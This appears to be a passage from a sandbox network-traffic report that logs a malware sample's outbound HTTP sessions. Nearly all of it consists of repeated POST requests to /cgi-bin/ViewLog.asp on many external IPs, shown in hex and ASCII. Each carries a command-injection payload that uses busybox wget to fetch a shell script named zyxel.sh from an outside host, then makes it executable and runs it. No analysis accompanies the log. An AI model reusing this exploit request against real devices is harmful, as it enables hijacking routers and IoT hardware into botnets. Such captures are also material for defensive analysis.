                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:20.774020910 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:05.828274965 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        321192.168.2.145671894.120.223.338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.258958101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        322192.168.2.145488494.187.98.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.267822027 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        323192.168.2.145936094.154.84.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.424666882 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        324192.168.2.143846231.136.188.2068080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.441042900 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:37.063769102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:38.311717987 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:40.839571953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:45.959357977 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:55.943103075 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:16.678145885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:57.636523962 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        325192.168.2.145002285.122.206.438080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.452936888 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        326192.168.2.145320031.136.134.458080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.457628012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:37.127744913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:38.471656084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:41.351607084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:46.727339029 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:57.478935957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:20.774039030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:03.780158043 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        327192.168.2.144434285.221.190.1538080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.465466022 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:36.695360899 CET411INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 09:33:34 GMT
                                                        Server: Webs
                                                        X-Frame-Options: SAMEORIGIN
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        328192.168.2.144433431.134.198.2328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.488457918 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:37.735722065 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.175662994 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:42.123518944 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:48.007338047 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:59.526838064 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:22.821861029 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:09.923935890 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


